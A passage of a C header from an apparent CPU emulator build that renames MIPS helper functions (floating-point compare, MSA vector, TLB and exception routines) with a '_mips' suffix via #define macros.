helper_cmp_d_ngl helper_cmp_d_ngl_mips #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips #define helper_cmp_d_lt helper_cmp_d_lt_mips #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips #define helper_cmp_d_nge helper_cmp_d_nge_mips #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips #define helper_cmp_d_le helper_cmp_d_le_mips #define helper_cmpabs_d_le helper_cmpabs_d_le_mips #define helper_cmp_d_ngt helper_cmp_d_ngt_mips #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips #define helper_cmp_s_f helper_cmp_s_f_mips #define helper_cmpabs_s_f helper_cmpabs_s_f_mips #define helper_cmp_s_un helper_cmp_s_un_mips #define helper_cmpabs_s_un helper_cmpabs_s_un_mips #define helper_cmp_s_eq helper_cmp_s_eq_mips #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips #define helper_cmp_s_ueq helper_cmp_s_ueq_mips #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips #define helper_cmp_s_olt helper_cmp_s_olt_mips #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips #define helper_cmp_s_ult helper_cmp_s_ult_mips #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips #define helper_cmp_s_ole helper_cmp_s_ole_mips #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips #define helper_cmp_s_ule helper_cmp_s_ule_mips #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips #define helper_cmp_s_sf helper_cmp_s_sf_mips #define 
helper_cmpabs_s_sf helper_cmpabs_s_sf_mips #define helper_cmp_s_ngle helper_cmp_s_ngle_mips #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips #define helper_cmp_s_seq helper_cmp_s_seq_mips #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips #define helper_cmp_s_ngl helper_cmp_s_ngl_mips #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips #define helper_cmp_s_lt helper_cmp_s_lt_mips #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips #define helper_cmp_s_nge helper_cmp_s_nge_mips #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips #define helper_cmp_s_le helper_cmp_s_le_mips #define helper_cmpabs_s_le helper_cmpabs_s_le_mips #define helper_cmp_s_ngt helper_cmp_s_ngt_mips #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips #define helper_cmp_ps_f helper_cmp_ps_f_mips #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips #define helper_cmp_ps_un helper_cmp_ps_un_mips #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips #define helper_cmp_ps_eq helper_cmp_ps_eq_mips #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips #define helper_cmp_ps_olt helper_cmp_ps_olt_mips #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips #define helper_cmp_ps_ult helper_cmp_ps_ult_mips #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips #define helper_cmp_ps_ole helper_cmp_ps_ole_mips #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips #define helper_cmp_ps_ule helper_cmp_ps_ule_mips #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips #define helper_cmp_ps_sf helper_cmp_ps_sf_mips #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips #define helper_cmp_ps_seq helper_cmp_ps_seq_mips #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mips #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips #define helper_cmp_ps_lt helper_cmp_ps_lt_mips #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips #define helper_cmp_ps_nge helper_cmp_ps_nge_mips #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips #define helper_cmp_ps_le helper_cmp_ps_le_mips #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips #define 
helper_r6_cmp_s_af helper_r6_cmp_s_af_mips #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips #define no_mmu_map_address no_mmu_map_address_mips #define fixed_mmu_map_address fixed_mmu_map_address_mips #define r4k_map_address r4k_map_address_mips #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips #define sync_c0_status sync_c0_status_mips #define cpu_mips_store_status cpu_mips_store_status_mips #define cpu_mips_store_cause cpu_mips_store_cause_mips #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips #define cpu_mips_translate_address cpu_mips_translate_address_mips #define exception_resume_pc exception_resume_pc_mips #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips #define r4k_invalidate_tlb r4k_invalidate_tlb_mips #define do_raise_exception_err do_raise_exception_err_mips #define helper_paddsb helper_paddsb_mips #define helper_paddusb helper_paddusb_mips #define helper_paddsh helper_paddsh_mips #define helper_paddush helper_paddush_mips #define helper_paddb helper_paddb_mips #define helper_paddh helper_paddh_mips #define helper_paddw helper_paddw_mips #define helper_psubsb helper_psubsb_mips #define helper_psubusb helper_psubusb_mips #define helper_psubsh helper_psubsh_mips #define helper_psubush helper_psubush_mips #define helper_psubb helper_psubb_mips #define helper_psubh helper_psubh_mips #define helper_psubw helper_psubw_mips #define helper_pshufh helper_pshufh_mips #define helper_packsswh helper_packsswh_mips #define helper_packsshb helper_packsshb_mips #define helper_packushb helper_packushb_mips #define helper_punpcklwd helper_punpcklwd_mips #define helper_punpckhwd helper_punpckhwd_mips #define helper_punpcklhw helper_punpcklhw_mips #define helper_punpckhhw helper_punpckhhw_mips #define helper_punpcklbh helper_punpcklbh_mips #define helper_punpckhbh helper_punpckhbh_mips #define helper_pavgh helper_pavgh_mips #define helper_pavgb helper_pavgb_mips #define helper_pmaxsh helper_pmaxsh_mips #define helper_pminsh helper_pminsh_mips #define helper_pmaxub helper_pmaxub_mips #define helper_pminub helper_pminub_mips #define helper_pcmpeqw helper_pcmpeqw_mips #define helper_pcmpgtw helper_pcmpgtw_mips #define helper_pcmpeqh helper_pcmpeqh_mips #define helper_pcmpgth helper_pcmpgth_mips #define helper_pcmpeqb helper_pcmpeqb_mips #define helper_pcmpgtb helper_pcmpgtb_mips #define helper_psllw helper_psllw_mips #define 
helper_psrlw helper_psrlw_mips #define helper_psraw helper_psraw_mips #define helper_psllh helper_psllh_mips #define helper_psrlh helper_psrlh_mips #define helper_psrah helper_psrah_mips #define helper_pmullh helper_pmullh_mips #define helper_pmulhh helper_pmulhh_mips #define helper_pmulhuh helper_pmulhuh_mips #define helper_pmaddhw helper_pmaddhw_mips #define helper_pasubub helper_pasubub_mips #define helper_biadd helper_biadd_mips #define helper_pmovmskb helper_pmovmskb_mips #define helper_msa_nloc_b helper_msa_nloc_b_mips #define helper_msa_nloc_h helper_msa_nloc_h_mips #define helper_msa_nloc_w helper_msa_nloc_w_mips #define helper_msa_nloc_d helper_msa_nloc_d_mips #define helper_msa_nlzc_b helper_msa_nlzc_b_mips #define helper_msa_nlzc_h helper_msa_nlzc_h_mips #define helper_msa_nlzc_w helper_msa_nlzc_w_mips #define helper_msa_nlzc_d helper_msa_nlzc_d_mips #define helper_msa_pcnt_b helper_msa_pcnt_b_mips #define helper_msa_pcnt_h helper_msa_pcnt_h_mips #define helper_msa_pcnt_w helper_msa_pcnt_w_mips #define helper_msa_pcnt_d helper_msa_pcnt_d_mips #define helper_msa_binsl_b helper_msa_binsl_b_mips #define helper_msa_binsl_h helper_msa_binsl_h_mips #define helper_msa_binsl_w helper_msa_binsl_w_mips #define helper_msa_binsl_d helper_msa_binsl_d_mips #define helper_msa_binsr_b helper_msa_binsr_b_mips #define helper_msa_binsr_h helper_msa_binsr_h_mips #define helper_msa_binsr_w helper_msa_binsr_w_mips #define helper_msa_binsr_d helper_msa_binsr_d_mips #define helper_msa_bmnz_v helper_msa_bmnz_v_mips #define helper_msa_bmz_v helper_msa_bmz_v_mips #define helper_msa_bsel_v helper_msa_bsel_v_mips #define helper_msa_bclr_b helper_msa_bclr_b_mips #define helper_msa_bclr_h helper_msa_bclr_h_mips #define helper_msa_bclr_w helper_msa_bclr_w_mips #define helper_msa_bclr_d helper_msa_bclr_d_mips #define helper_msa_bneg_b helper_msa_bneg_b_mips #define helper_msa_bneg_h helper_msa_bneg_h_mips #define helper_msa_bneg_w helper_msa_bneg_w_mips #define helper_msa_bneg_d helper_msa_bneg_d_mips #define helper_msa_bset_b helper_msa_bset_b_mips #define helper_msa_bset_h helper_msa_bset_h_mips #define helper_msa_bset_w helper_msa_bset_w_mips #define helper_msa_bset_d helper_msa_bset_d_mips #define helper_msa_add_a_b helper_msa_add_a_b_mips #define helper_msa_add_a_h helper_msa_add_a_h_mips #define helper_msa_add_a_w helper_msa_add_a_w_mips #define helper_msa_add_a_d helper_msa_add_a_d_mips #define helper_msa_adds_a_b helper_msa_adds_a_b_mips #define helper_msa_adds_a_h helper_msa_adds_a_h_mips #define helper_msa_adds_a_w helper_msa_adds_a_w_mips #define helper_msa_adds_a_d helper_msa_adds_a_d_mips #define helper_msa_adds_s_b helper_msa_adds_s_b_mips #define helper_msa_adds_s_h helper_msa_adds_s_h_mips #define helper_msa_adds_s_w helper_msa_adds_s_w_mips #define helper_msa_adds_s_d helper_msa_adds_s_d_mips #define helper_msa_adds_u_b helper_msa_adds_u_b_mips #define helper_msa_adds_u_h helper_msa_adds_u_h_mips #define helper_msa_adds_u_w helper_msa_adds_u_w_mips #define helper_msa_adds_u_d helper_msa_adds_u_d_mips #define helper_msa_addv_b helper_msa_addv_b_mips #define helper_msa_addv_h helper_msa_addv_h_mips #define helper_msa_addv_w helper_msa_addv_w_mips #define helper_msa_addv_d helper_msa_addv_d_mips #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips #define helper_msa_hadd_u_d 
helper_msa_hadd_u_d_mips #define helper_msa_ave_s_b helper_msa_ave_s_b_mips #define helper_msa_ave_s_h helper_msa_ave_s_h_mips #define helper_msa_ave_s_w helper_msa_ave_s_w_mips #define helper_msa_ave_s_d helper_msa_ave_s_d_mips #define helper_msa_ave_u_b helper_msa_ave_u_b_mips #define helper_msa_ave_u_h helper_msa_ave_u_h_mips #define helper_msa_ave_u_w helper_msa_ave_u_w_mips #define helper_msa_ave_u_d helper_msa_ave_u_d_mips #define helper_msa_aver_s_b helper_msa_aver_s_b_mips #define helper_msa_aver_s_h helper_msa_aver_s_h_mips #define helper_msa_aver_s_w helper_msa_aver_s_w_mips #define helper_msa_aver_s_d helper_msa_aver_s_d_mips #define helper_msa_aver_u_b helper_msa_aver_u_b_mips #define helper_msa_aver_u_h helper_msa_aver_u_h_mips #define helper_msa_aver_u_w helper_msa_aver_u_w_mips #define helper_msa_aver_u_d helper_msa_aver_u_d_mips #define helper_msa_ceq_b helper_msa_ceq_b_mips #define helper_msa_ceq_h helper_msa_ceq_h_mips #define helper_msa_ceq_w helper_msa_ceq_w_mips #define helper_msa_ceq_d helper_msa_ceq_d_mips #define helper_msa_cle_s_b helper_msa_cle_s_b_mips #define helper_msa_cle_s_h helper_msa_cle_s_h_mips #define helper_msa_cle_s_w helper_msa_cle_s_w_mips #define helper_msa_cle_s_d helper_msa_cle_s_d_mips #define helper_msa_cle_u_b helper_msa_cle_u_b_mips #define helper_msa_cle_u_h helper_msa_cle_u_h_mips #define helper_msa_cle_u_w helper_msa_cle_u_w_mips #define helper_msa_cle_u_d helper_msa_cle_u_d_mips #define helper_msa_clt_s_b helper_msa_clt_s_b_mips #define helper_msa_clt_s_h helper_msa_clt_s_h_mips #define helper_msa_clt_s_w helper_msa_clt_s_w_mips #define helper_msa_clt_s_d helper_msa_clt_s_d_mips #define helper_msa_clt_u_b helper_msa_clt_u_b_mips #define helper_msa_clt_u_h helper_msa_clt_u_h_mips #define helper_msa_clt_u_w helper_msa_clt_u_w_mips #define helper_msa_clt_u_d helper_msa_clt_u_d_mips #define helper_msa_div_s_b helper_msa_div_s_b_mips #define helper_msa_div_s_h helper_msa_div_s_h_mips #define helper_msa_div_s_w helper_msa_div_s_w_mips #define helper_msa_div_s_d helper_msa_div_s_d_mips #define helper_msa_div_u_b helper_msa_div_u_b_mips #define helper_msa_div_u_h helper_msa_div_u_h_mips #define helper_msa_div_u_w helper_msa_div_u_w_mips #define helper_msa_div_u_d helper_msa_div_u_d_mips #define helper_msa_max_a_b helper_msa_max_a_b_mips #define helper_msa_max_a_h helper_msa_max_a_h_mips #define helper_msa_max_a_w helper_msa_max_a_w_mips #define helper_msa_max_a_d helper_msa_max_a_d_mips #define helper_msa_max_s_b helper_msa_max_s_b_mips #define helper_msa_max_s_h helper_msa_max_s_h_mips #define helper_msa_max_s_w helper_msa_max_s_w_mips #define helper_msa_max_s_d helper_msa_max_s_d_mips #define helper_msa_max_u_b helper_msa_max_u_b_mips #define helper_msa_max_u_h helper_msa_max_u_h_mips #define helper_msa_max_u_w helper_msa_max_u_w_mips #define helper_msa_max_u_d helper_msa_max_u_d_mips #define helper_msa_min_a_b helper_msa_min_a_b_mips #define helper_msa_min_a_h helper_msa_min_a_h_mips #define helper_msa_min_a_w helper_msa_min_a_w_mips #define helper_msa_min_a_d helper_msa_min_a_d_mips #define helper_msa_min_s_b helper_msa_min_s_b_mips #define helper_msa_min_s_h helper_msa_min_s_h_mips #define helper_msa_min_s_w helper_msa_min_s_w_mips #define helper_msa_min_s_d helper_msa_min_s_d_mips #define helper_msa_min_u_b helper_msa_min_u_b_mips #define helper_msa_min_u_h helper_msa_min_u_h_mips #define helper_msa_min_u_w helper_msa_min_u_w_mips #define helper_msa_min_u_d helper_msa_min_u_d_mips #define helper_msa_mod_s_b helper_msa_mod_s_b_mips #define 
helper_msa_mod_s_h helper_msa_mod_s_h_mips #define helper_msa_mod_s_w helper_msa_mod_s_w_mips #define helper_msa_mod_s_d helper_msa_mod_s_d_mips #define helper_msa_mod_u_b helper_msa_mod_u_b_mips #define helper_msa_mod_u_h helper_msa_mod_u_h_mips #define helper_msa_mod_u_w helper_msa_mod_u_w_mips #define helper_msa_mod_u_d helper_msa_mod_u_d_mips #define helper_msa_asub_s_b helper_msa_asub_s_b_mips #define helper_msa_asub_s_h helper_msa_asub_s_h_mips #define helper_msa_asub_s_w helper_msa_asub_s_w_mips #define helper_msa_asub_s_d helper_msa_asub_s_d_mips #define helper_msa_asub_u_b helper_msa_asub_u_b_mips #define helper_msa_asub_u_h helper_msa_asub_u_h_mips #define helper_msa_asub_u_w helper_msa_asub_u_w_mips #define helper_msa_asub_u_d helper_msa_asub_u_d_mips #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips #define helper_msa_ilvev_b helper_msa_ilvev_b_mips #define helper_msa_ilvev_h helper_msa_ilvev_h_mips #define helper_msa_ilvev_w helper_msa_ilvev_w_mips #define helper_msa_ilvev_d helper_msa_ilvev_d_mips #define helper_msa_ilvod_b helper_msa_ilvod_b_mips #define helper_msa_ilvod_h helper_msa_ilvod_h_mips #define helper_msa_ilvod_w helper_msa_ilvod_w_mips #define helper_msa_ilvod_d helper_msa_ilvod_d_mips #define helper_msa_ilvl_b helper_msa_ilvl_b_mips #define helper_msa_ilvl_h helper_msa_ilvl_h_mips #define helper_msa_ilvl_w helper_msa_ilvl_w_mips #define helper_msa_ilvl_d helper_msa_ilvl_d_mips #define helper_msa_ilvr_b helper_msa_ilvr_b_mips #define helper_msa_ilvr_h helper_msa_ilvr_h_mips #define helper_msa_ilvr_w helper_msa_ilvr_w_mips #define helper_msa_ilvr_d helper_msa_ilvr_d_mips #define helper_msa_and_v helper_msa_and_v_mips #define helper_msa_nor_v helper_msa_nor_v_mips #define helper_msa_or_v helper_msa_or_v_mips #define helper_msa_xor_v helper_msa_xor_v_mips #define helper_msa_move_v helper_msa_move_v_mips #define helper_msa_pckev_b helper_msa_pckev_b_mips #define helper_msa_pckev_h helper_msa_pckev_h_mips #define helper_msa_pckev_w helper_msa_pckev_w_mips #define helper_msa_pckev_d helper_msa_pckev_d_mips #define helper_msa_pckod_b helper_msa_pckod_b_mips #define helper_msa_pckod_h helper_msa_pckod_h_mips #define helper_msa_pckod_w helper_msa_pckod_w_mips #define helper_msa_pckod_d helper_msa_pckod_d_mips #define helper_msa_sll_b helper_msa_sll_b_mips #define helper_msa_sll_h helper_msa_sll_h_mips #define helper_msa_sll_w helper_msa_sll_w_mips #define helper_msa_sll_d helper_msa_sll_d_mips #define helper_msa_sra_b helper_msa_sra_b_mips #define helper_msa_sra_h helper_msa_sra_h_mips #define helper_msa_sra_w helper_msa_sra_w_mips #define helper_msa_sra_d helper_msa_sra_d_mips #define helper_msa_srar_b helper_msa_srar_b_mips #define helper_msa_srar_h helper_msa_srar_h_mips #define helper_msa_srar_w helper_msa_srar_w_mips #define helper_msa_srar_d helper_msa_srar_d_mips #define helper_msa_srl_b helper_msa_srl_b_mips #define helper_msa_srl_h helper_msa_srl_h_mips #define helper_msa_srl_w helper_msa_srl_w_mips #define helper_msa_srl_d helper_msa_srl_d_mips #define helper_msa_srlr_b helper_msa_srlr_b_mips #define helper_msa_srlr_h helper_msa_srlr_h_mips #define helper_msa_srlr_w helper_msa_srlr_w_mips #define helper_msa_srlr_d helper_msa_srlr_d_mips #define helper_msa_andi_b helper_msa_andi_b_mips #define 
helper_msa_ori_b helper_msa_ori_b_mips #define helper_msa_nori_b helper_msa_nori_b_mips #define helper_msa_xori_b helper_msa_xori_b_mips #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips #define helper_msa_bmzi_b helper_msa_bmzi_b_mips #define helper_msa_bseli_b helper_msa_bseli_b_mips #define helper_msa_shf_df helper_msa_shf_df_mips #define helper_msa_addvi_df helper_msa_addvi_df_mips #define helper_msa_subvi_df helper_msa_subvi_df_mips #define helper_msa_ceqi_df helper_msa_ceqi_df_mips #define helper_msa_clei_s_df helper_msa_clei_s_df_mips #define helper_msa_clei_u_df helper_msa_clei_u_df_mips #define helper_msa_clti_s_df helper_msa_clti_s_df_mips #define helper_msa_clti_u_df helper_msa_clti_u_df_mips #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips #define helper_msa_mini_s_df helper_msa_mini_s_df_mips #define helper_msa_mini_u_df helper_msa_mini_u_df_mips #define helper_msa_ldi_df helper_msa_ldi_df_mips #define helper_msa_slli_df helper_msa_slli_df_mips #define helper_msa_srai_df helper_msa_srai_df_mips #define helper_msa_srli_df helper_msa_srli_df_mips #define helper_msa_bclri_df helper_msa_bclri_df_mips #define helper_msa_bseti_df helper_msa_bseti_df_mips #define helper_msa_bnegi_df helper_msa_bnegi_df_mips #define helper_msa_sat_s_df helper_msa_sat_s_df_mips #define helper_msa_sat_u_df helper_msa_sat_u_df_mips #define helper_msa_srari_df helper_msa_srari_df_mips #define helper_msa_srlri_df helper_msa_srlri_df_mips #define helper_msa_binsli_df helper_msa_binsli_df_mips #define helper_msa_binsri_df helper_msa_binsri_df_mips #define helper_msa_subv_df helper_msa_subv_df_mips #define helper_msa_subs_s_df helper_msa_subs_s_df_mips #define helper_msa_subs_u_df helper_msa_subs_u_df_mips #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips #define helper_msa_mulv_df helper_msa_mulv_df_mips #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips #define helper_msa_mul_q_df helper_msa_mul_q_df_mips #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips #define helper_msa_sld_df helper_msa_sld_df_mips #define helper_msa_maddv_df helper_msa_maddv_df_mips #define helper_msa_msubv_df helper_msa_msubv_df_mips #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips #define helper_msa_binsl_df helper_msa_binsl_df_mips #define helper_msa_binsr_df helper_msa_binsr_df_mips #define helper_msa_madd_q_df helper_msa_madd_q_df_mips #define helper_msa_msub_q_df helper_msa_msub_q_df_mips #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips #define helper_msa_splat_df helper_msa_splat_df_mips #define helper_msa_vshf_df helper_msa_vshf_df_mips #define helper_msa_sldi_df helper_msa_sldi_df_mips #define helper_msa_splati_df helper_msa_splati_df_mips #define helper_msa_copy_s_b helper_msa_copy_s_b_mips #define helper_msa_copy_s_h helper_msa_copy_s_h_mips #define helper_msa_copy_s_w helper_msa_copy_s_w_mips #define helper_msa_copy_s_d helper_msa_copy_s_d_mips #define helper_msa_copy_u_b helper_msa_copy_u_b_mips #define helper_msa_copy_u_h helper_msa_copy_u_h_mips #define helper_msa_copy_u_w helper_msa_copy_u_w_mips #define helper_msa_insert_b helper_msa_insert_b_mips #define helper_msa_insert_h 
helper_msa_insert_h_mips #define helper_msa_insert_w helper_msa_insert_w_mips #define helper_msa_insert_d helper_msa_insert_d_mips #define helper_msa_insve_df helper_msa_insve_df_mips #define helper_msa_ctcmsa helper_msa_ctcmsa_mips #define helper_msa_cfcmsa helper_msa_cfcmsa_mips #define helper_msa_fill_df helper_msa_fill_df_mips #define helper_msa_fcaf_df helper_msa_fcaf_df_mips #define helper_msa_fcun_df helper_msa_fcun_df_mips #define helper_msa_fceq_df helper_msa_fceq_df_mips #define helper_msa_fcueq_df helper_msa_fcueq_df_mips #define helper_msa_fclt_df helper_msa_fclt_df_mips #define helper_msa_fcult_df helper_msa_fcult_df_mips #define helper_msa_fcle_df helper_msa_fcle_df_mips #define helper_msa_fcule_df helper_msa_fcule_df_mips #define helper_msa_fsaf_df helper_msa_fsaf_df_mips #define helper_msa_fsun_df helper_msa_fsun_df_mips #define helper_msa_fseq_df helper_msa_fseq_df_mips #define helper_msa_fsueq_df helper_msa_fsueq_df_mips #define helper_msa_fslt_df helper_msa_fslt_df_mips #define helper_msa_fsult_df helper_msa_fsult_df_mips #define helper_msa_fsle_df helper_msa_fsle_df_mips #define helper_msa_fsule_df helper_msa_fsule_df_mips #define helper_msa_fcor_df helper_msa_fcor_df_mips #define helper_msa_fcune_df helper_msa_fcune_df_mips #define helper_msa_fcne_df helper_msa_fcne_df_mips #define helper_msa_fsor_df helper_msa_fsor_df_mips #define helper_msa_fsune_df helper_msa_fsune_df_mips #define helper_msa_fsne_df helper_msa_fsne_df_mips #define helper_msa_fadd_df helper_msa_fadd_df_mips #define helper_msa_fsub_df helper_msa_fsub_df_mips #define helper_msa_fmul_df helper_msa_fmul_df_mips #define helper_msa_fdiv_df helper_msa_fdiv_df_mips #define helper_msa_fmadd_df helper_msa_fmadd_df_mips #define helper_msa_fmsub_df helper_msa_fmsub_df_mips #define helper_msa_fexp2_df helper_msa_fexp2_df_mips #define helper_msa_fexdo_df helper_msa_fexdo_df_mips #define helper_msa_ftq_df helper_msa_ftq_df_mips #define helper_msa_fmin_df helper_msa_fmin_df_mips #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips #define helper_msa_fmax_df helper_msa_fmax_df_mips #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips #define helper_msa_fclass_df helper_msa_fclass_df_mips #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips #define helper_msa_frcp_df helper_msa_frcp_df_mips #define helper_msa_frint_df helper_msa_frint_df_mips #define helper_msa_flog2_df helper_msa_flog2_df_mips #define helper_msa_fexupl_df helper_msa_fexupl_df_mips #define helper_msa_fexupr_df helper_msa_fexupr_df_mips #define helper_msa_ffql_df helper_msa_ffql_df_mips #define helper_msa_ffqr_df helper_msa_ffqr_df_mips #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips #define helper_raise_exception_err helper_raise_exception_err_mips #define helper_raise_exception helper_raise_exception_mips #define helper_raise_exception_debug helper_raise_exception_debug_mips #define helper_muls helper_muls_mips #define helper_mulsu helper_mulsu_mips #define helper_macc helper_macc_mips #define helper_macchi helper_macchi_mips #define helper_maccu helper_maccu_mips #define helper_macchiu helper_macchiu_mips #define helper_msac helper_msac_mips #define helper_msachi helper_msachi_mips #define 
helper_msacu helper_msacu_mips #define helper_msachiu helper_msachiu_mips #define helper_mulhi helper_mulhi_mips #define helper_mulhiu helper_mulhiu_mips #define helper_mulshi helper_mulshi_mips #define helper_mulshiu helper_mulshiu_mips #define helper_dbitswap helper_dbitswap_mips #define helper_bitswap helper_bitswap_mips #define helper_rotx helper_rotx_mips #define helper_ll helper_ll_mips #define helper_lld helper_lld_mips #define helper_swl helper_swl_mips #define helper_swr helper_swr_mips #define helper_sdl helper_sdl_mips #define helper_sdr helper_sdr_mips #define helper_lwm helper_lwm_mips #define helper_swm helper_swm_mips #define helper_ldm helper_ldm_mips #define helper_sdm helper_sdm_mips #define helper_fork helper_fork_mips #define helper_yield helper_yield_mips #define r4k_helper_tlbinv r4k_helper_tlbinv_mips #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips #define r4k_helper_tlbwi r4k_helper_tlbwi_mips #define r4k_helper_tlbwr r4k_helper_tlbwr_mips #define r4k_helper_tlbp r4k_helper_tlbp_mips #define r4k_helper_tlbr r4k_helper_tlbr_mips #define helper_tlbwi helper_tlbwi_mips #define helper_tlbwr helper_tlbwr_mips #define helper_tlbp helper_tlbp_mips #define helper_tlbr helper_tlbr_mips #define helper_tlbinv helper_tlbinv_mips #define helper_tlbinvf 